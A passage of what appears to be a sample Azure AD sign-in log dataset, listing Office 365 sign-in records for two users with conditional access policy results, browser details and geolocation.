'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 17:48,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",c6df9c5c-6712-4175-a3db-58ce6f5b1700,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,c6df9c5c-6712-4175-a3db-58ce6f5b1700,SigninLogs,Sucess,33.7984581,-84.38828278
+1184,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,50:36.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,35809803-1a13-419c-9114-5794c646dd80,Microsoft.aadiam,Microsoft.aadiam,,Brandon,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 16:50,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",011e8186-a783-421c-9de9-87203add1300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Brandon,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,011e8186-a783-421c-9de9-87203add1300,SigninLogs,Sucess,41.90428925,-85.99833679
+1185,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:17.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,fc11d36e-e69c-410c-963d-af3838f72823,Microsoft.aadiam,Microsoft.aadiam,,Brandon,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 16:51,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",d1f5cda6-13d0-4741-81eb-e384a0281400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Brandon,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,d1f5cda6-13d0-4741-81eb-e384a0281400,SigninLogs,Sucess,41.90428925,-85.99833679
+1186,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,50:36.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,62aa951f-9da7-4241-a2b2-3b2037c7ffd7,Microsoft.aadiam,Microsoft.aadiam,,Brandon,4,US,Office 365 Exchange Online,00000002-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 16:50,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",d3a3c86e-d6a1-4323-9bc0-1a26e0351500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Brandon,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 Exchange Online,d3a3c86e-d6a1-4323-9bc0-1a26e0351500,SigninLogs,Sucess,41.90428925,-85.99833679
+1187,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,52:58.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,75241cf9-4f82-4e9e-841a-98c7ce024402,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 16:52,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",87802367-3de7-42c2-ada0-d6bcc3951400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,87802367-3de7-42c2-ada0-d6bcc3951400,SigninLogs,Sucess,33.7984581,-84.38828278
+1188,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,48:14.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2a441153-2f56-41f5-86a8-9fdaed59ba5d,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Microsoft Office 365 Portal,00000006-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 17:48,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",ec85dd07-c5e8-494c-aa5b-3f845ddc1600,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,ec85dd07-c5e8-494c-aa5b-3f845ddc1600,SigninLogs,Sucess,33.7984581,-84.38828278
+1189,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,45:51.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2c3cc7ea-0da8-4807-96f5-2770e5e462c2,Microsoft.aadiam,Microsoft.aadiam,,Brandon,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 16:45,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",e9cd98cc-4177-459a-870c-d2e459fd1300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Brandon,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,e9cd98cc-4177-459a-870c-d2e459fd1300,SigninLogs,Sucess,41.90428925,-85.99833679
+1190,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,56:20.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,57ce469f-b01e-0000-5421-7873a716e44b,Microsoft.aadiam,Microsoft.aadiam,,Brandon,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 16:56,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",3109113e-8f92-47c2-a124-2483f3961500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Brandon,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,3109113e-8f92-47c2-a124-2483f3961500,SigninLogs,Sucess,41.90428925,-85.99833679
+1191,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,48:04.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,6003d7eb-abc7-4481-b898-49a09f3619b6,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 17:48,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 